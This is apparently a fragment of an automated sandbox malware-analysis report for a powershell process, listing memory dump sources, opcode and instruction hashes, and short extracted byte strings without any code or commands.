                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb8b3e6e0f46e83483a7ee0af73c7d965d903e9883c7fbf0ac49d2433ae67e22
                                                                        • Instruction ID: 3e70cba2f999daeb3922c6335365b572c796b0d22adfe6370c901ae64edda382
                                                                        • Opcode Fuzzy Hash: bb8b3e6e0f46e83483a7ee0af73c7d965d903e9883c7fbf0ac49d2433ae67e22
                                                                        • Instruction Fuzzy Hash: 897176F17006068FCF249E68C8412AABBE1EFC5290F548CBAD945CB789DB31D949C7A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c74d3b1dc06be9b4a63fecbb602ffc3c32f1c2f80047daef3038547492e27414
                                                                        • Instruction ID: 3d50cde49a1e3d5baec4f4da6e30290f082cb30d19198309b3f903fc479ac5fc
                                                                        • Opcode Fuzzy Hash: c74d3b1dc06be9b4a63fecbb602ffc3c32f1c2f80047daef3038547492e27414
                                                                        • Instruction Fuzzy Hash: 6E717D30A00208DFDB18DFA5D844BADBBF2FF89308F549469D516AB790DB35AD4ACB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5c4996774b728230dfa98f6e74741f98613989433eddd1d96491a52c8247d1b5
                                                                        • Instruction ID: a8545b0fa00929ecd27d8aadf528afaad0d30775eb51862cd771b76db170ae97
                                                                        • Opcode Fuzzy Hash: 5c4996774b728230dfa98f6e74741f98613989433eddd1d96491a52c8247d1b5
                                                                        • Instruction Fuzzy Hash: 48618C30A00208CFDB18DF69C884A9EFBB6FF85308F14C56AD4069B755DB71AD46CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b76a1f241b5cfb9cc7ec77d50f85f3adffee7ed1b2433758efff6537ecca9bed
                                                                        • Instruction ID: d30b87b7ba3fe047e77be9c7034512747953ad5dec49d7a736e3c4e6d6ae62ec
                                                                        • Opcode Fuzzy Hash: b76a1f241b5cfb9cc7ec77d50f85f3adffee7ed1b2433758efff6537ecca9bed
                                                                        • Instruction Fuzzy Hash: 2F411F34B002049FDB08DF69D9547AEBBF7EFC8310F18C469D805AB795DA35AC468BA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b15ee09320dd228576b5b1f4cfe8c67bc0d49b72968808af504c689a53edef2f
                                                                        • Instruction ID: b48bf1861f18623794bb4a894bbe2942b7cfd3fd9f3179608b8039ba00d20894
                                                                        • Opcode Fuzzy Hash: b15ee09320dd228576b5b1f4cfe8c67bc0d49b72968808af504c689a53edef2f
                                                                        • Instruction Fuzzy Hash: E6514038A00209CFDB04DFA8D484ADD7BB6FF88314F149565D901AB3A5DB34EC85CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46bc80b87c2662c21166706ddc045dcc2a13efce4b598ebb1363595ad946ad51
                                                                        • Instruction ID: 076c198b7b63a5c105d5eb061e10e48f1c667eacb33651072e8182948710f4e2
                                                                        • Opcode Fuzzy Hash: 46bc80b87c2662c21166706ddc045dcc2a13efce4b598ebb1363595ad946ad51
                                                                        • Instruction Fuzzy Hash: 65411134B002049FDB08DF79D9547AEBAF7EFC8310F14C469D805AB795DA35AC458BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c304c926c40e86a64349b0e51db16c80dc940a73dd3b784b307cfe68f6b28950
                                                                        • Instruction ID: 27a038789ec573e785c895428d093c6c31f5ed2663f41a8cdfd4945fadf58819
                                                                        • Opcode Fuzzy Hash: c304c926c40e86a64349b0e51db16c80dc940a73dd3b784b307cfe68f6b28950
                                                                        • Instruction Fuzzy Hash: 5841D7F0706202DFCF248F648645B6A77B2AFC6284F158CA5DA449F365D732E846CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18e00e814e618606f44822eb98c519f3ada2f4d3a06ce1272d0e662a41bbc72d
                                                                        • Instruction ID: a08ee1b962b37fb17719090d4536f089183ceebf0f0404311181b33db5c48454
                                                                        • Opcode Fuzzy Hash: 18e00e814e618606f44822eb98c519f3ada2f4d3a06ce1272d0e662a41bbc72d
                                                                        • Instruction Fuzzy Hash: B7419C30B006048FDB18DF74C958AADBBF2EF88355F055468E506EB7A0DB34AD42CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b4b13595056e0a9c9261191a4ff022604231bdd5b5cbfafd963d12aec818d08
                                                                        • Instruction ID: c2b9d8bbf0cc3bb7d9a2257c3c4a1fabd4b64bd75f8a2996731ce92239d58179
                                                                        • Opcode Fuzzy Hash: 6b4b13595056e0a9c9261191a4ff022604231bdd5b5cbfafd963d12aec818d08
                                                                        • Instruction Fuzzy Hash: A3419C30B006048FDB18DF74C958AADBBB2EF88355F055468E506EB7A0DB34AD42CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1816c2a300bbff4f4f3c19defd76fdaf6f7fd219639fac296ac796b380a737b5
                                                                        • Instruction ID: 13307f81b57e9fb14c56296717934fc9740cccb8f170beaea89a38c3533d9f69
                                                                        • Opcode Fuzzy Hash: 1816c2a300bbff4f4f3c19defd76fdaf6f7fd219639fac296ac796b380a737b5
                                                                        • Instruction Fuzzy Hash: 42413874A005059FCB09CF58C9D49AAFBB1FF88314B158699DA05AB365C732FC91CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b211c9f92b98715eb002214ce0b97e8f0f42f643da59f1bf9ee6dceb9008c471
                                                                        • Instruction ID: 78f1e368a11742265da4bac8f6db4572ecb7d3b76d467d4e74ebc79dbb7a3b24
                                                                        • Opcode Fuzzy Hash: b211c9f92b98715eb002214ce0b97e8f0f42f643da59f1bf9ee6dceb9008c471
                                                                        • Instruction Fuzzy Hash: 072179B1300316ABDF24667A8890736B6DAEBC5741F248C3AA545CB381CE72D841C371
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5d0ece825bb540def8681bdd9db0733ce7222310d96b849c1f6618b3888c2e76
                                                                        • Instruction ID: 586852d5cbb45a2d58907e324271c26fcf48c826afc8f12e09cfc4b34ad2480c
                                                                        • Opcode Fuzzy Hash: 5d0ece825bb540def8681bdd9db0733ce7222310d96b849c1f6618b3888c2e76
                                                                        • Instruction Fuzzy Hash: 2A2127B06043029FCF205B64C9013BA7BB19FD2380F0488A6D504DB396DB76C949CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557345019.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4a0d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8ca6884693e18a95db8fa26122abd97c7ad45b144f1f5c1c17ea1542779a92f8
                                                                        • Instruction ID: 03ce3d7c2a69947fcef060d73c5462c03167a0dae5246dafadfd189752ed321e
                                                                        • Opcode Fuzzy Hash: 8ca6884693e18a95db8fa26122abd97c7ad45b144f1f5c1c17ea1542779a92f8
                                                                        • Instruction Fuzzy Hash: AB21F775604300DFCB15CF54E9C4B16BF65FB88324F24C569E9095A296C37AE416CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26aad0b88026fe50ccb4cef7a32305e870630c020d1a8cefc30931eb923c3414
                                                                        • Instruction ID: 6cae49fba12ec8e0b1b249150bc776befd021e5b1bd5702f1fb33ccf60d8d29a
                                                                        • Opcode Fuzzy Hash: 26aad0b88026fe50ccb4cef7a32305e870630c020d1a8cefc30931eb923c3414
                                                                        • Instruction Fuzzy Hash: B2218BB0308385ABDF245A7989D07767BA19F81740F188C66E544CB3D2CAA9DC85C371
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6600d9e7878eaa8d71aaf0bfd57d14bd803f08267bef116071d6f76523ada620
                                                                        • Instruction ID: a38ab69791771b21f021fdb0228ca37dee97c46b488c3c97339b923f9386af50
                                                                        • Opcode Fuzzy Hash: 6600d9e7878eaa8d71aaf0bfd57d14bd803f08267bef116071d6f76523ada620
                                                                        • Instruction Fuzzy Hash: F2215E74A042198FCB01DF9CD9809AEBBB1FF49310B118559D844EB352C731FC41CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557345019.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4a0d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                        • Instruction ID: b9416c44fec45a975152ea6d9a914cb9fe0f24127e1cd1c508c2ba214a5ea1ba
                                                                        • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                                        • Instruction Fuzzy Hash: 8D219076504240DFCF16CF10D5C4B55BF71FB48314F24C5A9E9494A656C33AD45ACF92
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557345019.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4a0d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e04e90d634e2f936e694f76980dc6fbe978928d934a7debcaa3b663106d0730
                                                                        • Instruction ID: efd32acf6efa5085afb5a4fe6c985d64a893f6548783c8fc61b3078ce82dfec7
                                                                        • Opcode Fuzzy Hash: 1e04e90d634e2f936e694f76980dc6fbe978928d934a7debcaa3b663106d0730
                                                                        • Instruction Fuzzy Hash: 7211E0B5504280CFDB15DF14E5C4B15BBA1FB44314F24C6ADD9494B692C37BE44ACB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557345019.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4a0d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 167e26c06cc7fc1d9dc4809bd32c288e7c79cb1e1431f70cc5774c16b419f9fa
                                                                        • Instruction ID: 66941dc9c0c541856a090dbae7d471849cdc6186830000b42fe76c0fcb908973
                                                                        • Opcode Fuzzy Hash: 167e26c06cc7fc1d9dc4809bd32c288e7c79cb1e1431f70cc5774c16b419f9fa
                                                                        • Instruction Fuzzy Hash: 58012B725053049AF7208F55FD84B67BF9CEF45320F18C429ED4E0B2C6D279A845CAB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557345019.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4a0d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e0c9fa2ac5bf0f7cb4ef8e01a08843a6241526176c069d29a90abd857e16d64
                                                                        • Instruction ID: bc3ba508dd793260368635c9401b238b24b0a210ccf301285a5eef2446d8292d
                                                                        • Opcode Fuzzy Hash: 2e0c9fa2ac5bf0f7cb4ef8e01a08843a6241526176c069d29a90abd857e16d64
                                                                        • Instruction Fuzzy Hash: 6101407240E3C49EE7128B259D94756BFB4EF43224F1CC0DBD9888F197C2695849C776
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 91fd3e2e4fa5cb85e6f3be21130f66ba8a3f51ae37e65ee58aa048c6ee933dae
                                                                        • Instruction ID: 01faf22d152f93cb455ac7e60b537497341c81c460c39032a5b5d9f19b0638c9
                                                                        • Opcode Fuzzy Hash: 91fd3e2e4fa5cb85e6f3be21130f66ba8a3f51ae37e65ee58aa048c6ee933dae
                                                                        • Instruction Fuzzy Hash: 35F0363A3109204F87056B78B56C4BE7BABEBC9625314415EE907DB791DF38DC0287A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 63bb41fdbbf9ff95dce95ac95b9f017e8d049abeb4332223661a1dc2a9d35262
                                                                        • Instruction ID: f2721970f22a0830dc2f7dd324a0110307eb62c01880ce52bf5b20642c0190fe
                                                                        • Opcode Fuzzy Hash: 63bb41fdbbf9ff95dce95ac95b9f017e8d049abeb4332223661a1dc2a9d35262
                                                                        • Instruction Fuzzy Hash: 38F0F636301500ABDB142B29A81866E77ABFFC9215B00853DD10A8B284DF75BC068791
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 31da0def1dbfb1545e539d4921ca6d0c775e6fd48a94a0eb342b9eaa14f29344
                                                                        • Instruction ID: f467e29d003668ea9e149d0540dfa99db9dbb702fe94f75c9f9ff64dfc9e0d60
                                                                        • Opcode Fuzzy Hash: 31da0def1dbfb1545e539d4921ca6d0c775e6fd48a94a0eb342b9eaa14f29344
                                                                        • Instruction Fuzzy Hash: F3F036393109104F87056B68B56C47E3BABEBC9615314415EE907D7391DF38DC028755
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef08bb28c2fc6814ec5decf0a75bf7c52ca06840798a108ff1de027907b1b6c2
                                                                        • Instruction ID: b15658ab24c25eb66e61edf450fcc0ec0701fa6e336088b1c198bf12fad48053
                                                                        • Opcode Fuzzy Hash: ef08bb28c2fc6814ec5decf0a75bf7c52ca06840798a108ff1de027907b1b6c2
                                                                        • Instruction Fuzzy Hash: 85F027373061515BC706226879685FE7F66EBCE21131441ABE10ACB786CE255C0783E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c496fa36aaea5d85c81105145068fcb542bfa53eb86992ca33cffce1c05ccca
                                                                        • Instruction ID: 4425586c0e3e636fa28d7fdc4622cf8452bf1dfe03c6106ee1ef9f0be58681d2
                                                                        • Opcode Fuzzy Hash: 9c496fa36aaea5d85c81105145068fcb542bfa53eb86992ca33cffce1c05ccca
                                                                        • Instruction Fuzzy Hash: 46F027363092445FDB056B797C281AC3B53EFC965570481AFD147CB2A2D958E9068352
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f5ab52ac4e9479c1a962ab5d87d84119151680e01b5997e3718a14198c50f59
                                                                        • Instruction ID: 719015e9d6f1e35b96677ac307f44ae260cd3d9ab00049a014568a7a92490f68
                                                                        • Opcode Fuzzy Hash: 2f5ab52ac4e9479c1a962ab5d87d84119151680e01b5997e3718a14198c50f59
                                                                        • Instruction Fuzzy Hash: ABE01230814549DFCB06DFA4E5664ED7F31FF02211B0011ADD91757662E6311645CF86
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 614daefef759596c5be29e1d68537b5d2f3e70a7fbeb34bac535159648ef9637
                                                                        • Instruction ID: d57ae52e0cbb3542e26e9dd55c64ee4ec374efbd657575f0149517e07e66a8d2
                                                                        • Opcode Fuzzy Hash: 614daefef759596c5be29e1d68537b5d2f3e70a7fbeb34bac535159648ef9637
                                                                        • Instruction Fuzzy Hash: E9D05E30E441088FC748EFA4E8464BEBBB6EB84301F00416DDE0A93395EA302D41CFC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2557640113.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_4ef0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 13213f5bfe48d8b18c3f77b911201f77013773273187780187c86f4fd112e78d
                                                                        • Instruction ID: 4715cf29cccd8f47fc8dd995ef5fc69a60f0a8c10f2e08345d18fc71d73a2d27
                                                                        • Opcode Fuzzy Hash: 13213f5bfe48d8b18c3f77b911201f77013773273187780187c86f4fd112e78d
                                                                        • Instruction Fuzzy Hash: 0CD0673090450ADBCB48AFA5E85A4FEBB35EB50206F40016EDA0752692EA302A5ACAC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b65a722da59276484495b89e3753c8bf0613b7a27ca13bef9d5310609d68c1cf
                                                                        • Instruction ID: e0665572ba1907243d91f41429b9a06d6ba99a6873bcbdcbf30fb092b0329ad2
                                                                        • Opcode Fuzzy Hash: b65a722da59276484495b89e3753c8bf0613b7a27ca13bef9d5310609d68c1cf
                                                                        • Instruction Fuzzy Hash: F0A01130200800CBC200CA08CE82800B320ABC030AB28C0ACA80A8F282CB23E8038A00
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                                                        • API String ID: 0-3118609902
                                                                        • Opcode ID: 6245d7cc1af102564497d09f065719104bddfbe6d3cc025691a86e1a37f4b9fd
                                                                        • Instruction ID: 91929a9f52507fa79a0f1062938c9dc3bc68717b16830645caf8fc807b844993
                                                                        • Opcode Fuzzy Hash: 6245d7cc1af102564497d09f065719104bddfbe6d3cc025691a86e1a37f4b9fd
                                                                        • Instruction Fuzzy Hash: 5171F9B0710206DFDF248F68DA50AAAB7E2EFC5791F548CA9D8418B790CB71DD42C7A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$WPj$tP]q$tP]q$$]q$(cq$(cq$(cq
                                                                        • API String ID: 0-2116439584
                                                                        • Opcode ID: 3d7cad950e773b032daccaa02ae01a9de59ac0f7dfa1bcee705921fcc144edb5
                                                                        • Instruction ID: 6f20b14d61b6f33d9e9f396251697265f0830fefe2945d9f8352601ba33ad5f6
                                                                        • Opcode Fuzzy Hash: 3d7cad950e773b032daccaa02ae01a9de59ac0f7dfa1bcee705921fcc144edb5
                                                                        • Instruction Fuzzy Hash: C37196B0610206DFDF24DF54C740BBAB7F6AF85791F598865E844AB291C731DC42CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                        • API String ID: 0-108373575
                                                                        • Opcode ID: 9717746e697b5ec2af25b0299747a4a65c998bbd4c0ff8f31098d2ed47f98b74
                                                                        • Instruction ID: c6a3866bfaf15b5de15d439d397c99d1c1604e058d911aed717eec8422cd77f7
                                                                        • Opcode Fuzzy Hash: 9717746e697b5ec2af25b0299747a4a65c998bbd4c0ff8f31098d2ed47f98b74
                                                                        • Instruction Fuzzy Hash: 46917BB17053018FCF259A6899006BABBE69FC6650F158C7AC645CB391DE32EC05CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                        • API String ID: 0-3723351465
                                                                        • Opcode ID: c151c198485b4289e31cc0fc8de378c2b49da20e0b6d3b1af66c05790e3d21d8
                                                                        • Instruction ID: 0ef5e0e0e75ab88a7fbc87630bcf77330e358bd8300bde640f16814c93ea9ade
                                                                        • Opcode Fuzzy Hash: c151c198485b4289e31cc0fc8de378c2b49da20e0b6d3b1af66c05790e3d21d8
                                                                        • Instruction Fuzzy Hash: D43127B27043078FDF290A69D858177B7E5AFC1692B688CBFC4818B241DE35C449C353
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tzk$0U]q$4']q$4']q$_
                                                                        • API String ID: 0-3365155209
                                                                        • Opcode ID: 86ee0e0bbbbbdbc8f24aa7103e33a283db5b07e536d951e650803fc2a12fbaaa
                                                                        • Instruction ID: 3007414ee8df2df2e0cae8962b7509a7684149e4d2bacd2ad62c66e5cbdd9107
                                                                        • Opcode Fuzzy Hash: 86ee0e0bbbbbdbc8f24aa7103e33a283db5b07e536d951e650803fc2a12fbaaa
                                                                        • Instruction Fuzzy Hash: D27126B1B042068FEF14CF6C984466EBBA6EFC6251F25C87AD509CB251DA36CC46C761
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2561755787.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7770000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                        • API String ID: 0-2353078639
                                                                        • Opcode ID: b065776b67a3822e4f6e1e7a31889a68f8cf6843776e832cf1aced4c4e6c31f5
                                                                        • Instruction ID: 19371eda381ae4fc7c2669e6eb53491e2d40ec7cd26a80436d914ad3f421247a
                                                                        • Opcode Fuzzy Hash: b065776b67a3822e4f6e1e7a31889a68f8cf6843776e832cf1aced4c4e6c31f5
                                                                        • Instruction Fuzzy Hash: 4E414BB07143069FDF255B688820ABA7FA1AFC1244F548CAAD945CB391DF36C946C7A1
                                                                        Strings
                                                                        Memory Dump Source
